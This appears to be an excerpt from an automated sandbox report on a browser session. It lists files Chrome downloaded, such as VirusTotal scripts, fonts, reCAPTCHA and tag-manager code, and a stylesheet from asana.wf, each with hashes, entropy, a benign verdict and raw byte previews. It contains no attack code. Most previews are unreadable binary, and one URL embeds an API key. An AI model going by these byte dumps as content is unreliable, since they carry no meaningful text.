                                                                                                                                                                                                                    Preview:...........\y....?..K%2a.X..=@S..(.W.q.r..H.<....@...=..w...90..]...v.....f...NY...M..H....o..7.].......&J...}...?..vW.......W........=..^.o..f..u3..p.d&.._.^6..r0......7....Kn....z%..\.....dr=.....onn.......h8p..>....;].E...)..!f.....*.$..~.N.e_..D..].."..zx....i)GUzT'..._..W.*X&i%.~_.....vE.tN..Q..d[.....l..E4O......6...../..=(d.gp......bs>.N./.b.4YU...V.z...^..K...x..|m....i....T../\.l....m.X7W..2......|..b.L2.8....{n(.pC....uM..D>3........f.Z.R...@?..J..lV=lE...h..0..^...;S0N..xV.J..d&f.{.nA...H6I......y.;...LhE.."JY...{`d.K.....T....V.".s2q...R......W.t.fWV..+r....6Jw".i..{d2..V=._....w..(\(.{..u_Wa.E..&.St._..;.s...?<.x.<[&.....~W$...|>.a.....8..^.H.......=DE...=...\X.d..9Q......$q..G...P..X8..!...|.`.KGdqy.Tk|...m.d..........p..Ywy.;.4.G.......l.yQ9`H.-..f...%........UTTr.MT-.t6...,_.N..B..&..n.J8..%KnFI..N...g''.?...\;.......6M.~..A!..B.....W....?x......f..7w*.)f.... .e..,............|u.........'@.hi.."..}....*U.|.......Fh....S..1.
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):163209
                                                                                                                                                                                                                    Entropy (8bit):3.7263661514908097
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:1536:IMgzmmeByo8sPyo8sFpId8eX2hkVgWNQL2M+J+QvQ1uu4oZm:tgarBybsPybsFpI8eX2hkVF+2bJH
                                                                                                                                                                                                                    MD5:685C6B62A446A9C54B88577BF042693D
                                                                                                                                                                                                                    SHA1:C35AB49360CAF228F8C51105146E6980F79F14DA
                                                                                                                                                                                                                    SHA-256:732195FB80243863EF58100CDF9711A10564FB2753EA36116F73272445BFD759
                                                                                                                                                                                                                    SHA-512:8D679AEF1A5304176BBCC1AB571103247F4546A7BCE170B2F0422E0300F095484D693EAE9FD40529D7D58EF22679757AC5C9799811847213DE1CE66AAA79DB3D
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://www.virustotal.com/ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/dropped_files?limit=10&cursor=eyJsaW1pdCI6IDEwLCAib2Zmc2V0IjogMTB9
                                                                                                                                                                                                                    Preview:{. "data": [. {. "id": "96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7",. "type": "file",. "links": {. "self": "https://www.virustotal.com/ui/files/96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7". },. "attributes": {. "last_submission_date": 1713946620,. "first_seen_itw_date": 1574691631,. "names": [. "__PSScriptPolicyTest_ab0ocemr.3d3.psm1",. "__PSScriptPolicyTest_3j2kmvyb.l4x.psm1",. "__PSScriptPolicyTest_jc2v3fmr.ems.psm1",. "__PSScriptPolicyTest_n2ip2cdg.dbg.psm1",. "__PSScriptPolicyTest_pwltdhl1.rz4.psm1",. "__PSScriptPolicyTest_k3edum3g.lli.psm1",. "__PSScriptPolicyTest_qmizpich.1n3.psm1",. "__PSScriptPolicyTest_fk20dauc.h3a.psm1",. "__PSScriptPolicyTest
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:gzip compressed data, max compression, original size modulo 2^32 221
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):200
                                                                                                                                                                                                                    Entropy (8bit):6.841014064623295
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:6:XtqDe7vzqnoDf20BZm/6EIlKTOUgo+F8Rl:XSA2gs/6EIlCLo8Rl
                                                                                                                                                                                                                    MD5:751911295BFFBFE07B94E21C19D23E50
                                                                                                                                                                                                                    SHA1:CB4BBFB5C73B6A38FDC2DE7E55D32AD984D0106A
                                                                                                                                                                                                                    SHA-256:413AC989E713AF6DF5BF755FF4063A782E139E0C8B666836508DCD4C03370EA1
                                                                                                                                                                                                                    SHA-512:92F3AF4802BB5F6F208A7F8B68E3BE742231C68CC5DF207D3B6BC0CFC335DF202CEE4C04AE11C74B10ECBCF5B7AAB43C7251DC5E0713F85C30D986DCEACB5CC6
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    Preview:..........L.;..0..w~..u..TPj(.....VJR..J...b..N...G..[...Vafz.k.....{7<.Z...!...l|.\...Q..3.8....dDPJ...j.z...9....Z_....B3.a..A+<...R@..".....5....,.E..n[0Y..(.$.H.+.}.`].u.N..[.|.........k?....
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:Web Open Font Format (Version 2), TrueType, length 14712, version 1.0
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):14712
                                                                                                                                                                                                                    Entropy (8bit):7.984524638079703
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:384:J1xXvtvezpO6syafJ+CnNcxHGoY/7NazJq:dXvFysJfcqNqmFDNaM
                                                                                                                                                                                                                    MD5:3AFEAE0D768769F5E5F30AC9805C5B70
                                                                                                                                                                                                                    SHA1:3ADA17C2B462DB3E7A1FD85C3F4670DFE7704F4D
                                                                                                                                                                                                                    SHA-256:0D0A6262C545E8BBC895116E5AFB22579C468D7ABB77E378F377D6FED57C1DCE
                                                                                                                                                                                                                    SHA-512:71C361AC0D7B72B222D4F087B46D1BEA318ED6652C4D37EC3403F0B0616482B5040232E06F2FCF13109CDF6151DC209E882C0DB40B2C6ACE4E2E0292FCDCDAB5
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://www.virustotal.com/gui/2121f4aabac6fbe523ec.woff2
                                                                                                                                                                                                                    Preview:wOF2......9x.......8..9..........................n..<....`..b...|.@..d..6.$..D. ..|..4..v%.m.... FO.#F"l.d..#......?t..'$.2..n..Ye.1$..]...$s..W.s9.<%.L.1}Yy.6...-. b..[......7!..<K.W|.ij.f..?.\;.....N.$..T(.}.9."0n..........g)@.WE..@.....ZV..=U...;....}.:.t.H.B..H((2.E%$.@1...s.]..R]T..2..vQ.m.7....bm....T.....To.w..v)...H..).B!@..,.zB.ev.....3..L....[..z...\f[...BUV...^...0..8.....D.......\.$_e;.._../K.0.D..0.@..`...mn.....b......h..#.n?.A..}v.l..]yq.......*].#=N..9p..9b.8i.!Hl......(.p.>.....{..`.^}W..Fc.O.~.....f..a.%..k.I..e9@Ov.dH.M......i.T.....K.x|L1C..j..r.l..#.l/...=.Z...e...,k.<...A.A.I..]..@._...z.o.f2.....8,..?..qDUQ.S....a..L$V........K.d.F=~Ga..`.T.H......e{\...^..4cap...o!`9.-.d......._.k.Na..@.......`>.d.*.E...N....!.DE....`e.)P.R......Q.H....FA0..[U......I....d.......y{...J^...........]#...kH....0..}..C.|b}.n.....7$c. ...........y....-.0...}..D..#...>}.Q.....*...=R...?.4....n...5.!93"/<9Ao.v.e..Jw.S..0..RK...L..k..)....-...M.
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (588)
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):593
                                                                                                                                                                                                                    Entropy (8bit):4.875497797926263
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:12:u/qJeKCH2MpupAUZBHslriFuO5PF7kwuOqLZw4/ffffffff0wzyV:i5KCHV8AUZBHslgu0PF7F9qLqmfffffy
                                                                                                                                                                                                                    MD5:B197D4FBE3BEB754B22BD31F5180FD9B
                                                                                                                                                                                                                    SHA1:FB0E5F4C11C723F2A097205BCB1CB8CFD2ED7A90
                                                                                                                                                                                                                    SHA-256:8272992495FA5FA7E5519607CAD338ABB7B8474F7128F0CC8429FAA79C75BA03
                                                                                                                                                                                                                    SHA-512:550AADB09148237AC0D2B3B7AEC6B6DD9D233AC5D053A2429ADE5EE1EEDBDB3BCAF80BAE4CEFFA164C99061376024B80E245AEE03F981AE688766EB84B3020E2
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=virus&oit=1&cp=5&pgcl=4&gs_rn=42&psi=3aV4RE0JYE4q_43B&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
                                                                                                                                                                                                                    Preview:)]}'.["virus",["virus","virustotal","viruses","virus scan","virus definition","virus protection","virus checker","virus scanner","virus examples","virus protection for computer"],["","","","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:suggestrelevance":[1300,950,601,600,555,554,553,552,551,550],"google:suggestsubtypes":[[512,433],[512,433,131],[512,433],[512,433],[512,433],[512,433],[512,433],[512,433,131],[512],[512]],"google:suggesttype":["QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY"],"google:verbatimrelevance":1300}]
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:gzip compressed data, max compression, original size modulo 2^32 27594
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):6720
                                                                                                                                                                                                                    Entropy (8bit):7.96999578659284
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:192:YZm8s5R39H6/FJDaqzQtYAOOeZzRKrNY48cXdsaBZ:embt90T1pAOOuzRKr/zdRZ
                                                                                                                                                                                                                    MD5:8F26466B33827229891074ECCBFE34DC
                                                                                                                                                                                                                    SHA1:A1F06C5AF59D3949CC51AAFCE679C54C3214D5A6
                                                                                                                                                                                                                    SHA-256:1C265D426C041F4EDA16772B1EE7454106333C3F52449A640A42E8A5FDD8DCBA
                                                                                                                                                                                                                    SHA-512:5AF275CC799AF1CA63B09EB12A626449707454096B1C984F50F91B3B4B306345387CA58642C12AE79FB27F379D4EFE7D6B8A444E29AFE6E1E2CE9439E5DC16AD
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://www.virustotal.com/gui/54383.6935deb0ecf100e5b899.js
                                                                                                                                                                                                                    Preview:...........]mw.6..._.h.>dL...H...q2.M...i..zTZ.m6..CRv<...>x%..J.I;=g.........^......).".T..[..Ep.._G...W...M5.'.Y.d.......\..+..tksc...lo.......~o{x1.&U.gn.'~....m..o....<...I.O;....:./...y...T..S.Tq.Uyq..P.v..N|...............{xp.P.%JP.G.W....e..!..B..:1%.1....O......T.1%.&Q.BTP..$v..Z..u.:.....L..b......-A..b...:..4..........E.. ."?+..8.JN..Owo.>y8............i4.....e..zP.e.F...z..cX,..++.l>;.....R.i.]VW.=z.Va.Q.da..k.{.....}9......;....x..O.,.>....S...y<.N.....k..w_]...S-..a.X.oY|.`D.."/..a.....*.]WN.;.Ub'.5..<...#.e.8.9;......=..x.P|J...rr:..3...s...N....z.,...i....m.~.>..E..W[E.#,.F.}.M[.j.8...qb....|X.i.....ZF.P.w...C6OSxb.F..A|r.......L..c../.O0...e<....>......F..?.-]?...y.x..i2.VW..4:.+.'..QC.au..p<......:/...E4O......S8.<..b\...4..@.}X-.#>[....s..S.t|.>...}.../..x..q.>.7q.Tw...q1.B./.y.Y.>..d...|..Zr....F....)./0.y.q-.....l....B^kEW....[,..e......]u.q......loz...|..t.7<6...2..v.Jv_.&..|.D.%.C.......'..G.s......". #J.....
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:gzip compressed data, max compression, original size modulo 2^32 20294
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):7600
                                                                                                                                                                                                                    Entropy (8bit):7.969501708842959
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:96:bnJDJp5v+VyURRpmQTTXWa1pgODrwWhlJoCM8wugF6c9AJWZFRQgh5QbFNtGeCvt:FX5v+Nf0mTnbPwglCCi9/FRQLbF61
                                                                                                                                                                                                                    MD5:21B00DCF05443C736D422106A1B1CF83
                                                                                                                                                                                                                    SHA1:40B24A77E0BDE12CFF13744B0DCC942DECFBC1C5
                                                                                                                                                                                                                    SHA-256:643CC041103C325578D06D1817DB3454ED0523EA74B2568772623D499517E749
                                                                                                                                                                                                                    SHA-512:D414AC04389F2BCE28D338BEF2AF1080017B419CA30F2ED4E0982909A36012777552A112348ECA747707F8A59E70C8248633DB14134535E52866390CE9C2E70B
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://www.virustotal.com/gui/55164.0738a891fce6393c9b5c.js
                                                                                                                                                                                                                    Preview:...........\.s.F..~..B.:D...~P....+...l..]U../H.E.$..@=V..~...AR.s^.\3.8..~OO7.q+V..F.6....r[}...o.....3....w......Q...;.>..7....Y.9...m[a.]S...u.....'Q.e.U.W7.".j.5.2.7.._.$.}.|%:#.V..*.bz!..f..V.+..U.........E..JTW....g..nRmW..tZ?..?.~.....O7..z#...{..r........b<.y.h:..6.^.?...k.>.i.N.B..&.YN......\....6#..P...y~1u.s.6..T...O......9i/..p.../...ci.7..6...O.O...X...T.uV.c...U....DU.F.*..V.8x?.+.m;'.....l.;..s..e.:`_5....^.~...3.b...f-.....o..4.}.Y.....]..]97 ....J..U.4v...Vm...._......-..~...t1..A.Wn>.W.......8V.7.-.)~......7..k<.......!./e.yct.[.~.........9.........iC?..9..).}..i.?I.!.N-....Y].)....l.].-..e.Z.`..$.8WV..x.!P..u]...;..?....m,.....ve;.4.CvL..J.....$.m5&H>J~)..r.E..c}............5.......b<..'.L....!........j%~...U.e3.$V|.._.6..d.u.K.....%..g.jl:]..%...<.....o..Wu..^....[.....b...P&.PN.Z3......u]w.....T..?0.e.^.....q>-..(.....H.F.{..hS.%1.n.,...F.ob....0nl.u.....b..,.BT...Y..;.[.9_.....t..F.......A..PF.....9....
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):181
                                                                                                                                                                                                                    Entropy (8bit):4.328146837827697
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3:TDFFF0KBojEV5hPKZHFFFizXO8HOAWRRkPFzA5KiAFVTCWI1A5HFNhBUliAn:TD/uaoBZAbO8HvWRRe3ePilNXUwAn
                                                                                                                                                                                                                    MD5:478EBD50127DA8FF67F45FF32B1FADC9
                                                                                                                                                                                                                    SHA1:1AD153784C05C6BE30B95D8835CEDD9D5183FFA8
                                                                                                                                                                                                                    SHA-256:EE402D01A943841EAFC309DF31EA958A981844B5C7A4A833164A22036B624C42
                                                                                                                                                                                                                    SHA-512:B1EA3400186FCFE43A9DFFCA955A13A0E5DF6C0A77EAE47129447F1FB9110B618B786969ABADF975D3AE36A3CB4B19F1CD1483232F3024F3BA5B10BC902D1018
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    Preview:{. "error": {. "code": "RecaptchaRequiredError",. "message": "Please re-send request with a valid reCAPTCHA response in the \"x-recaptcha-response\" header". }.}
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (631)
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):517649
                                                                                                                                                                                                                    Entropy (8bit):5.713376874006511
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:6144:m1K1Z7NMxjW6eJoWvAlUjWwuMSYCVvLk8DSWd1Ps8Jz38iZc:m6eWTAujfuPY0JGgkt
                                                                                                                                                                                                                    MD5:E2E79D6B927169D9E0E57E3BAECC0993
                                                                                                                                                                                                                    SHA1:1299473950B2999BA0B7F39BD5E4A60EAFD1819D
                                                                                                                                                                                                                    SHA-256:231336ED913A5EBD4445B85486E053CAF2B81CAB91318241375F3F7A245B6C6B
                                                                                                                                                                                                                    SHA-512:D6A2ED7B19E54D1447EE9BBC684AF7101B48086945A938A5F9B6AE74ACE30B9A98CA83D3183814DD3CC40F251AB6433DC7F8B425F313EA9557B83E1C2E035DFF
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://www.gstatic.com/recaptcha/releases/V6_85qpc2Xf2sbe3xTnRte7m/recaptcha__en.js
                                                                                                                                                                                                                    Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/./*. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/./*.. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright 2005, 2007 Bob Ippolito. All Rights Reserved.. Copyright The Closure Library Authors.. SPDX-License-Identifier: MIT.*/./*.. Apache License. Version 2.0, January 2004. https://www.apache.org/licenses/.. TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION.. 1. Definitions... "License" shall mean the terms and conditions for use, reproduction,. and distribution as defined by Sections 1 through 9 of this document... "Licensor" shall mean the copyright owner or entity authorized by. the copyright owner that is granting the License... "Legal Entity" shall mean the union of the acting entity and all. other entities that contro
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (21769)
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):229550
                                                                                                                                                                                                                    Entropy (8bit):5.545066839156578
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3072:TQaf5qZ3fdO+QW98fG1LceF2/eaJQ9STnXDL9btIMMb3Htw:TQXlNgYLceF+1TnXP9RIM83HS
                                                                                                                                                                                                                    MD5:F8027A36D44F9CA574C23C3D3C9F44AD
                                                                                                                                                                                                                    SHA1:C076894313FC570FF506049C59E06F21A7570D64
                                                                                                                                                                                                                    SHA-256:872B232BDAA5C74F3F874D0FC46A132B4A97497A93692210B17BC9CBE9996ABA
                                                                                                                                                                                                                    SHA-512:D60E9E2CC78C8DB69C2B1A60EEE6A2F0E21B7C277F0D6D2C889FAE6289DBBF9028DF94B090AFDE24DAA71901EC71DEE9F6E58AD977AD8B94052687DC90FD3AE0
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://www.googletagmanager.com/gtm.js?id=GTM-KFBGZNL
                                                                                                                                                                                                                    Preview:.// Copyright 2012 Google Inc. All rights reserved.. . (function(w,g){w[g]=w[g]||{};. w[g].e=function(s){return eval(s);};})(window,'google_tag_manager');. .(function(){..var data = {."resource": {. "version":"52",. . "macros":[{"function":"__u","vtp_component":"PATH","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__e"},{"function":"__remm","vtp_setDefaultValue":false,"vtp_input":["macro",0],"vtp_fullMatch":true,"vtp_replaceAfterMatch":true,"vtp_ignoreCase":true,"vtp_map":["list",["map","key","\/gui\/search\/([^\\\/]*)\/files","value","\/gui\/search\/:search_query\/files"],["map","key","\/gui\/group\/([^\\\/]*)\/users","value","\/gui\/group\/:id\/users"]]},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"user_id"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"custom_event.elementId"},{"function":"__u","vtp_component":"URL","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreE
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:gzip compressed data, max compression, original size modulo 2^32 435
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):230
                                                                                                                                                                                                                    Entropy (8bit):6.83589882589754
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:6:XtPoxcJ32DD2FAj33qKWRtC5Ptr4k4ZmSoilm5ln:XhAcJzF43xqCZtr4Ndm5l
                                                                                                                                                                                                                    MD5:1D5CD95FED8E58EDEDA3AAC6985A56C9
                                                                                                                                                                                                                    SHA1:6494790EA7A43B322E4E2B4FAA2C30F2FF89A246
                                                                                                                                                                                                                    SHA-256:4C6BF128F38470143AAF3F104C6CD97FBE25ADA6AA95A8979CDC5622ED9EF75B
                                                                                                                                                                                                                    SHA-512:6D27872A66A68F4AB51E32FB61B8D3952EC37D2A80162F125DE842BE27BEEAE68C015A5A0BAC34F8668BFFB018649E17A2EAB645A5644E9FAD7450C7F72ACAF0
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://www.virustotal.com/gui/manifest.json
                                                                                                                                                                                                                    Preview:...............0...<.2....A..x1....86..#...u.x"zh......1b.kh.?2~...q....x7..V..O{.H.'....).h..t..h1#w....F.Kx....gV@.h..u.. K....>.cc..tK...LZ.........+.t.LH.Q.......7t...VB.`2.'.t....k.q.....5..),J.C.8..q.)........F......
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:Web Open Font Format (Version 2), TrueType, length 21324, version 1.0
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):21324
                                                                                                                                                                                                                    Entropy (8bit):7.991052983575686
                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                    SSDEEP:384:eZBf1ohSB1nBGAKqTZzH0CBa4IOy+0ucFaZ9xiSXDFFXztOpd0jF2RZZY:kBf1o016qTZACBaZ2cMZ9xiSDFvAd0jR
                                                                                                                                                                                                                    MD5:1435F3CFD01BF0F3C24B8983E6780DB0
                                                                                                                                                                                                                    SHA1:439AB7FFA6F9D5B654710691D8736EEDF2B6E892
                                                                                                                                                                                                                    SHA-256:8CD3F9F312E86BADE2E77EB25C28EBA805707909441D49E29288944677CE6D47
                                                                                                                                                                                                                    SHA-512:DDED0517B2C8F6C6EA045BA87F3AE870DF63843291C3E2219E7BDEB4E33BAF360B5FDB6065F0566FD1C79253105574EE4CA8CB13A11F7E6A51BF20EACF03155B
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://fonts.gstatic.com/s/googlesans/v59/4Ua_rENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iqcsih3SAyH6cAwhX9RFD48TE63OOYKtrwEIJllpyk.woff2
                                                                                                                                                                                                                    Preview:wOF2......SL.......$..R...........................6.....4.`?STATx..J.....`..(..Z..6.$.... ..4..K.......s..t. ....T.v..v...]g.b.8.1..d..'$'2....W..VU...,.:.PE.Jx qh..:'..q.d.n..".N.D.-....U<.w........u-n.....F._Q-.... {.{.a.V..S....W...:....xn)eX........-...1....(...#.gwN...G..._[..}o^M23.....Fr."..V...Q............*Fa!.E...YJD`.....}....<[.uT..J..R*.5.C+(.D..q.....c][X)....$.......&T..*:.......mg.m;...o'.!l.q..K..........Lm....>E.8.+7.-\.I.. _`...F.:.@..P86r.......Y.P#..Ji{.O3...I.5y....v[..z.........>..b;C..."...}ke.....IX...6...a.v..m...w.....H.{a!.L...,?..I=.....\ ....z..w.....n...:......>.........j.......G....U...i......!U.[..`.....L...L..c...H.o......r*#78..T..+7}g...5....h.'.=...nY.f.I..R.!$E.<E.J..X.9.....i.t.C.....1..G..fg...9]..........~...j.7g..&...#L O<!..u..}.....0..vH.^z.../)(;.,...Xa%9..p|9B.}...)....N0...a"..N.+Zx......O..R.[.9.%J.(.k0.r..k.O.g5..M..A.)..BD..w...wb...../-.....*"""..q\.m.V......Av..%+p....w../G...?r...f.n..
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):181
                                                                                                                                                                                                                    Entropy (8bit):4.328146837827697
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3:TDFFF0KBojEV5hPKZHFFFizXO8HOAWRRkPFzA5KiAFVTCWI1A5HFNhBUliAn:TD/uaoBZAbO8HvWRRe3ePilNXUwAn
                                                                                                                                                                                                                    MD5:478EBD50127DA8FF67F45FF32B1FADC9
                                                                                                                                                                                                                    SHA1:1AD153784C05C6BE30B95D8835CEDD9D5183FFA8
                                                                                                                                                                                                                    SHA-256:EE402D01A943841EAFC309DF31EA958A981844B5C7A4A833164A22036B624C42
                                                                                                                                                                                                                    SHA-512:B1EA3400186FCFE43A9DFFCA955A13A0E5DF6C0A77EAE47129447F1FB9110B618B786969ABADF975D3AE36A3CB4B19F1CD1483232F3024F3BA5B10BC902D1018
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    Preview:{. "error": {. "code": "RecaptchaRequiredError",. "message": "Please re-send request with a valid reCAPTCHA response in the \"x-recaptcha-response\" header". }.}
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (512)
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):1169586
                                                                                                                                                                                                                    Entropy (8bit):5.013984365811426
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:12288:zhVh8PdxoKIEM9AYCX/CFK7i+ya038UFBhurT:G
                                                                                                                                                                                                                    MD5:A9915A19F6B231E7A2546BB43064D011
                                                                                                                                                                                                                    SHA1:4FD29B44CE05015F8B16DE04A077EAD4995148F7
                                                                                                                                                                                                                    SHA-256:A67AA841C3C09B77D43B11AC79FE1F887CEB2114E793E00D7FEB174B0C5E61E0
                                                                                                                                                                                                                    SHA-512:D1A9FC2CE31003BF69A5BFFF56AFAC4BD52B2D676F13A55B5D0AF3B80D35C155A8C2D857C362EFA9D4F28E01358096CE4671C7CC127DB4676ED96A5F7A9E6BD4
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://asana.wf/css/reskin-0451c4949d.css
                                                                                                                                                                                                                    Preview:@charset "UTF-8";./* stylelint-disable */./*! sanitize.css v5.0.0 | CC0 License | github.com/jonathantneal/sanitize.css */./* Document (. ========================================================================== */./**. * 1. Remove repeating backgrounds in all browsers (opinionated).. * 2. Add box sizing inheritence in all browsers (opinionated).. */.*,.::before,.::after {. background-repeat: no-repeat; /* 1 */. box-sizing: inherit; /* 2 */.}../**. * 1. Add text decoration inheritance in all browsers (opinionated).. * 2. Add vertical alignment inheritence in all browsers (opinionated).. */.::before,.::after {. text-decoration: inherit; /* 1 */. vertical-align: inherit; /* 2 */.}../**. * 1. Add border box sizing in all browsers (opinionated).. * 2. Add the default cursor in all browsers (opinionated).. * 3. Prevent font size adjustments after orientation changes in IE and iOS.. */.html {. box-sizing: border-box; /* 1 */. cursor: default; /* 2 */. -ms-text-size-adjust: 100%; /*
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:gzip compressed data, max compression, original size modulo 2^32 76567
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):20170
                                                                                                                                                                                                                    Entropy (8bit):7.988330744595929
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:384:z5tJj0BMjv+YpqdDpTu3CDMm5tf0YhQPzXEUeLlTyzw2tNG2Ifxy/6O8dOCm:z3JoB0mpdD+CQlY8yLl+8q5oy/6wCm
                                                                                                                                                                                                                    MD5:CAFDA8A4D0D3D6CCC311799C1D551E10
                                                                                                                                                                                                                    SHA1:56BB6CDB94268546CE62960335BAD0A80A496159
                                                                                                                                                                                                                    SHA-256:54C6183F9C238A47FEAB8A7CBCFD340FD3F04612EB743C367437225FBBC50389
                                                                                                                                                                                                                    SHA-512:40833DF71E4A33EC3A1CC78347D44EFF1A8F1C17BF6591C8A373F30D0C787B961037EC1C10C1B2B7E18ADFD0E92C3128A1B6A502BF6DF7E8217C4C615F385D86
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://www.virustotal.com/gui/55336.395909bfc12937421b2d.js
